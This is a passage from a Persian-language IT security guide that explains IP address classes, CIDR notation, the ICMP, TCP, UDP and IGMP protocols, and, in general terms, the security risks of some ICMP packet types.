‫‪274 Bolt Beranek and Newman‬‬
‫‪275 Subnetting‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٩٤‬‬

‫ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ ‪B‬‬


‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ B‬ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻳﻲ ﺑﺎ ﻗﺎﻟﺐ ‪ N.M.a.b‬ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ‪ N.M‬ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻭ ‪ a.b‬ﺷﻤﺎﺭﺓ ﻣﻴﺰﺑﺎﻥ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ ﺑﺎ ﺍﺭﺯﺷﺘﺮﻳﻦ ﺩﻭ ﺑﻴﺖ ‪ N‬ﺑﺎﻳﺪ ‪ 10‬ﺑﺎﺷﻨﺪ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ B‬ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮒ ﺗﺠﺎﺭﻱ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪.‬‬

‫ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ ‪C‬‬


‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ C‬ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻳﻲ ﺑﺎ ﻗﺎﻟﺐ ‪ N.M.O.a‬ﻫﺴﺘﻨﺪ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ‪ N.M.O‬ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻭ ‪ a‬ﺷﻤﺎﺭﺓ ﻣﻴﺰﺑﺎﻥ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ ﺑﺎ ﺍﺭﺯﺷﺘﺮﻳﻦ ﺳﻪ ﺑﻴﺖ ‪ N‬ﺑﺎﻳﺪ ‪ 110‬ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺪﺍﻛﺜﺮ ‪ ٢٥٤‬ﻣﻴﺰﺑﺎﻥ ﺭﺍ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ‬
‫ﺩﻫﻨﺪ‪ ٢٧٦.‬ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺷﺒﻜﺔ ﻛﻼﺱ ‪ C‬ﺩﺍﺭﻧﺪ‪.‬‬

‫ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ ‪D‬‬


‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ D‬ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻳﻲ ﺑﺎ ﻗﺎﻟﺐ ‪ N.M.O.a‬ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺁﻧﻬﺎ ﺑﺎ ﺍﺭﺯﺷﺘﺮﻳﻦ ﭼﻬﺎﺭ ﺑﻴﺖ ‪ N‬ﺑﺎﻳﺪ ‪ 1110‬ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﺘﻌﻠﻖ ﺑﻪ ﺷﺒﻜﻪﻫﺎ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ‪ multicast‬ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻣﺠﻤﻮﻋﻪﻫﺎﻳﻲ ﺍﺯ‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﭘﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ ﻣﺸﺘﺮﻙ ﺍﻧﺘﻈﺎﺭ ﻣﻲﻛﺸﻨﺪ‪.‬‬

‫ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ ‪E‬‬


‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ E‬ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻳﻲ ﺑﺎ ﻗﺎﻟﺐ ‪ N.M.O.P‬ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺁﻧﻬﺎ ﺑﺎ ﺍﺭﺯﺷﺘﺮﻳﻦ ﭼﻬﺎﺭ ﺑﻴﺖ ‪ N‬ﺑﺎﻳﺪ ‪ 1111‬ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺁﺯﻣﺎﻳﺸﻲ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻛﻼﺳﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﺣﻔﺮﻩﻫﺎﻱ ﺑﺰﺭﮔﻲ ‪ -‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺁﺩﺭﺳﻬﺎ ﻛﻪ ﻫﻴﭽﮕﺎﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﺷﺪﻧﺪ ‪ -‬ﺩﺍﺷﺘﻨﺪ‪ .‬ﺑﺎ ﺍﻓﺰﺍﻳﺶ‬
‫ﻲ‬
‫ﻧﺎﮔﻬﺎﻧﻲ ﺗﻌﺪﺍﺩ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﻳﻚ ﺗﻌﺒﻴﺮ ﻧﺴﺒﺘﹰﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﺷﺒﻜﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪ ﻛﻪ ﺩﺭ ﻧﺴﺒﺖ ﺩﺍﺩﻥ ﺁﺩﺭﺳﻬﺎ ﺍﺟﺎﺯﺓ ﻛﻮﭼﻜ ﹺ‬
‫ﺑﻴﺸﺘﺮ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻫﺪﺭ ﺭﻓﺘﻦ ﻛﻤﺘﺮ ﺁﺩﺭﺳﻬﺎ ﺭﺍ ﻣﻲﺩﺍﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﻣﺴﻴﺮﻳﺎﺑﻲ ﺑﺪﻭﻥ ﻃﺒﻘﻪﺑﻨﺪﻱ ﻣﻴﺎﻥ ﺩﺍﻣﻨﻪﻫﺎ )‪ ٢٧٧(CIDR‬ﻧﺎﻡ ﺩﺍﺭﺩ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﺎﻡ ﺑﺮﻣﻲﺁﻳﺪ‪ ،‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﭼﻴﺰﻱ ﺑﻪ ﻧﺎﻡ ﻛﻼﺱ ﺁﺩﺭﺱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﺑﺠﺎﻱ ﺁﻥ ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪﻫﺎ ﺑﻮﺳﻴﻠﺔ‬
‫ﺑﺎﺍﺭﺯﺷﺘﺮﻳﻦ ‪ k‬ﺑﻴﺖ ﻫﺮ ﺁﺩﺭﺱ ﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﻣﺎﺑﻘﻲ ﺑﻴﺘﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﺩﺭﺱ ﻛﻪ ﻣﻌﺮﻑ ﺷﻤﺎﺭﺓ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺖ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﺓ ﺳﺮﻭﻳﺲ‪ ،‬ﻣﺤﺪﻭﺩﻩﺍﻱ ﺍﺯ ﺁﺩﺭﺳﻬﺎ ﺩﺍﺩ ﻛﻪ ‪ ١٤‬ﺑﻴﺖ ﺍﻭﻝ ﺁﻧﻬﺎ ﻳﻚ ﻣﻘﺪﺍﺭ ﺛﺎﺑﺖ )ﺁﺩﺭﺱ ﺷﺒﻜﻪ(‪ ،‬ﻭ ‪ ١٨‬ﺑﻴﺖ‬
‫ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﻧﻤﺎﻳﺎﻧﮕﺮ ﻣﻘﺎﺩﻳﺮ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺍﻧﺘﺴﺎﺏ ﺑﻪ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﺓ ﺳﺮﻭﻳﺲ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ‪ ٢١٨‬ﺁﺩﺭﺱ‬
‫ﻣﺘﻤﺎﻳﺰ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺗﺨﺼﻴﺺ ﺩﻫﺪ‪.‬‬
‫ﻻ ﺑﺎ ﺑﻴﺎﻥ ﮐﻮﭼﮑﺘﺮﻳﻦ ﺁﺩﺭﺱ ‪ IP‬ﻣﺤﺪﻭﺩﻩ‪ ،‬ﻳﻚ ﻋﻼﻣﺖ ﻣﻤﻴﺰ‪ ،‬ﻭ ﺳﭙﺲ ﺍﻧﺪﺍﺯﺓ ﻗﺴﻤﺖ ﺷﺒﻜﻪ ﺑﺮ ﺣﺴﺐ ﺑﻴﺖ ﺑﻪ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ‪ CIDR‬ﻣﻌﻤﻮ ﹰ‬
‫ﻼ ﺷﺒﻜﺔ ‪ 128.200.0.0/14‬ﻧﻤﺎﻳﺎﻧﮕﺮ ﺗﻤﺎﻡ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺍﺯ ‪ 128.200.0.0‬ﺗﺎ ‪ 128.203.255.255‬ﺍﺳﺖ‪.‬‬ ‫ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫‪٢٧٨‬‬
‫ﻳﻚ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺍﻳﻦ ﺷﺒﻜﻪ ﺑﻴﺎﻥ ﮐﻮﭼﮑﺘﺮﻳﻦ ﺁﺩﺭﺱ ‪ IP‬ﻣﺤﺪﻭﺩﻩ‪ ،‬ﻳﻚ ﻋﻼﻣﺖ ﻣﻤﻴﺰ‪ ،‬ﻭ ﺳﭙﺲ ‪ netmask‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻧﻤﻮﻧﻪ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ﺩﺭ ﻣﺜﺎﻝ ﻗﺒﻞ ﺁﻣﺪ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺑﺼﻮﺭﺕ ‪ 128.200.0.0/255.252.0.0‬ﺑﻴﺎﻥ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﺭﻭﺵ ‪ CIDR‬ﺑﺎ ﻗﺎﻟﺐ ﺁﺩﺭﺱﺩﻫﻲ ﻛﻼﺳﻴﻚ ﺳﺎﺯﮔﺎﺭ ﺍﺳﺖ‪ :‬ﻗﺴﻤﺖ ﺷﺒﻜﺔ ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ ‪ A‬ﺍﺯ ‪ ٨‬ﺑﻴﺖ ﺗﺸﻜﻴﻞ ﺷﺪﻩ )ﻣﺜ ﹰ‬
‫ﻼ‬
‫‪ ،(10.0.0.0/8‬ﻛﻼﺱ ‪ B‬ﺍﺯ ‪ ١٦‬ﺑﻴﺖ )ﻣﺜ ﹰﻼ ‪ (192.168.0.0/16‬ﻭ ﻣﺎﺑﻘﻲ ﻛﻼﺳﻬﺎﻱ ﺁﺩﺭﺱ ﻧﻴﺰ ﺑﻪ ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ‪.‬‬

‫‪ ۲۷۶‬ﺍﺷﻜﺎﻻﺕ ﻭ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ‪ ،IP‬ﺟﻠﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ۰‬ﻳﺎ ‪ ۲۵۵‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻣﻌﺘﺒﺮ ﺭﺍ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫‪277 Classless Inter-Domain Routing‬‬
‫‪ ۲۷۸‬ﻳﻚ ﺷﻤﺎﺭﻩ ﻣﺸﺎﺑﻪ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻛﻪ ﺩﺭ ﺁﻥ ‪ k‬ﺑﻴﺖ ﺑﺎ ﺍﺭﺯﺵ ﺑﻴﺸﺘﺮ ﻛﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻣﻘﺪﺍﺭ ‪ ۱‬ﻭ ﻣﺎﺑﻘﻲ ﺑﻴﺘﻬﺎ ﻣﻘﺪﺍﺭ ‪ ۰‬ﺩﺍﺭﻧﺪ‪.‬‬
‫‪٣٩٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺴﺘﻪﻫﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎ‬
‫ﺍﻣﺮﻭﺯﻩ ﭼﻬﺎﺭ ﻧﻮﻉ ﺍﺻﻠﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻭ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺩﻳﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻫﺮ ﻧﻮﻉ‬
‫ﺑﺴﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﺮﻭﺗﻜﻞ ﺧﺎﺻﻲ ﺍﺳﺖ‪) .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎ ﺗﻮﺳﻂ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺭﻭﻱ ﺷﺎﻫﺮﺍﻩﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﻳﺎ ‪VPN‬ﻫﺎ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪(.‬‬

‫‪ICMP‬‬
‫‪٢٧٩‬‬
‫ﭘﺮﻭﺗﻜﻞ ﭘﻴﺎﻡ ﻛﻨﺘﺮﻟﻲ ﺍﻳﻨﺘﺮﻧﺖ ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﭘﺮﻭﺗﻜﻞ ‪ - IP‬ﻣﺜ ﹰ‬
‫ﻼ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺗﺮﺍﻓﻴﻚ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻲ ‪-‬‬
‫ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺯﻳﺮﻧﻮﻋﻬﺎﻱ ﺯﻳﺎﺩﻱ ﻧﻴﺰ ﺩﺍﺭﺩ‪.‬‬

‫‪TCP‬‬
‫‪٢٨٠‬‬
‫ﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﺍﺗﺼﺎﻝ ﺩﻭﻃﺮﻓﺔ ﺟﺮﻳﺎﻧﻲ ﻣﻴﺎﻥ ﺩﻭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺯ ﺑﺮﻗﺮﺍﺭﻱ‬
‫ﺍﺗﺼﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻧﺘﻘﺎﻝ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺗﻤﺎﻡ ﻭﻗﺖ‪ ٢٨١‬ﻭ ﺍﻧﺘﻘﺎﻝ ﻣﺠﺪﺩ‪ ٢٨٢‬ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ‬
‫ﻣﻲﮔﻴﺮﺩ‪.‬‬

‫‪UDP‬‬
‫‪٢٨٣‬‬
‫ﭘﺮﻭﺗﻜﻞ ‪ datagram‬ﻛﺎﺭﺑﺮ ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺑﺴﺘﻪﻫﺎ ﺍﺯ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﺩﻳﮕﺮ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ‬
‫ﺑﺪﻭﻥ ﺍﺗﺼﺎﻝ‪ ٢٨٤‬ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻣﺤﺴﻮﺏ ﻧﻤﻲﺷﻮﺩ ﻭ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﭘﻴﺎﻡ ﻣﻜﺎﻧﻴﺰﻡ ﺧﺎﺻﻲ‬
‫ﻧﺪﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺷﺮﺍﻳﻂ ﻣﻌﻤﻮﻟﻲ ﺍﻛﺜﺮ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﻨﺪ‪.‬‬

‫‪IGMP‬‬
‫‪٢٨٥‬‬
‫ﭘﺮﻭﺗﻜﻞ ﻣﺪﻳﺮﻳﺖ ﮔﺮﻭﻩ ﺍﻳﻨﺘﺮﻧﺖ ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺩﺭ ﻛﻨﺘﺮﻝ ‪ multicast‬ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ ،‬ﻛﻪ ﻓﺮﺳﺘﺎﺩﻥ ﺗﻌﻤﺪﻱ ﻳﻚ ﺑﺴﺘﻪ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﻳﻚ‬
‫ﻣﻴﺰﺑﺎﻥ ﺍﺳﺖ‪ Multicast .‬ﭘﺎﻳﻪ ﻭ ﺍﺳﺎﺱ ﺷﺎﻫﺮﺍﻩﻫﺎﻱ ﭼﻨﺪﺭﺳﺎﻧﻪﺍﻱ ﺍﻳﻨﺘﺮﻧﺖ ‪ - MBONE -‬ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫‪ICMP‬‬

‫ﭘﺮﻭﺗﻜﻞ ﭘﻴﺎﻡ ﻛﻨﺘﺮﻟﻲ ﺍﻳﻨﺘﺮﻧﺖ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺩﺭ ﺗﺒﺎﺩﻝ ﭘﻴﺎﻣﻬﺎ ﻣﻴﺎﻥ ﺩﺭﻭﺍﺯﻩﻫﺎ ﻭ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ‪ ping‬ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﭘﮋﻭﺍﻙ‪ ICMP ٢٨٦‬ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺍﺗﺼﺎﻝ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﻭﺍﻛﻨﺶ ﺑﻪ ﻳﻚ ﺑﺴﺘﺔ‬
‫ﻻ ﻳﻚ ﭘﺎﺳﺦ ﭘﮋﻭﺍﻙ ‪ ICMP‬ﺍﺳﺖ ﻭ ﻳﺎ ﻳﻚ ﭘﻴﺎﻡ ‪ ICMP‬ﻣﺒﺘﻨﻲ ﺑﺮ ﻏﻴﺮﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻮﺩﻥ ﻣﻘﺼﺪ‪.‬‬ ‫ﭘﮋﻭﺍﻙ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺳﺮﺁﻳﻨﺪ ‪) IP‬ﺁﺩﺭﺳﻬﺎﻱ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺑﺴﺘﻪ(‪ ،‬ﻫﺮ ﺑﺴﺘﺔ ‪ ICMP‬ﻳﻚ ﺳﺮﺁﻳﻨﺪ ‪ ICMP‬ﻧﻴﺰ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻣﻘﺪﺍﺭ ‪ ٨‬ﺑﻴﺘﻲ‬
‫ﻣﺸﺨﺺﻛﻨﻨﺪﺓ ﻧﻮﻉ ﺑﺴﺘﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺑﺴﺘﻪﻫﺎﻱ ‪ ICMP‬ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻫﻤﭽﻨﺎﻥ ﺩﺭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ‪ TCP/IP‬ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﮔﺎﻫﻲ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﺩﻗﻴﻘﺘﺮ‬
‫ﺑﮕﻮﻳﻴﻢ‪ ،‬ﺑﺴﺘﻪﻫﺎﻱ ﻧﻮﻉ ‪) ٣‬ﺍﻋﻼﻡ ﻏﻴﺮﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻮﺩﻥ ﻣﻘﺼﺪ(‪ ،‬ﻧﻮﻉ ‪) ٤‬ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﻣﺒﺪﺃ(‪ ،‬ﻭ ﻧﻮﻉ ‪) ٥‬ﻫﺪﺍﻳﺖ ﻣﺠﺪﺩ( ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻪ‬
‫ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﻮﻥ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻦ ﺍﻧﻮﺍﻉ ﺑﺴﺘﻪﻫﺎﻱ ‪ ICMP‬ﺑﻔﺮﺳﺘﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﻫﺪﺍﻳﺖ‬
‫ﻛﻨﺪ ﻭ ﻳﺎ ﺁﻏﺎﺯﮔﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺑﺎﺷﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺴﺘﻘﻴﻢ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﻧﮕﺎﺭﺷﻬﺎﻱ‬
‫ﻻ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳﺨﻬﺎﻱ ﻳﻜﺴﺎﻧﻲ ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺍﻟﮕﻮﻱ ﭘﺎﺳﺨﻬﺎ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﻮﻉ‬ ‫ﻣﺘﻔﺎﻭﺕ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻌﻤﻮ ﹰ‬

‫‪279‬‬ ‫‪Internet Control Message Protocol‬‬


‫‪280‬‬ ‫‪Transmission Control Protocol‬‬
‫‪281‬‬ ‫‪Timeout‬‬
‫‪282‬‬ ‫‪Retransmission‬‬
‫‪283‬‬ ‫‪User Datagram Protocol‬‬
‫‪284‬‬ ‫‪Connectionless‬‬
‫‪285‬‬ ‫‪Internet Group Management Protocol‬‬
‫‪286‬‬ ‫‪Echo‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٩٦‬‬

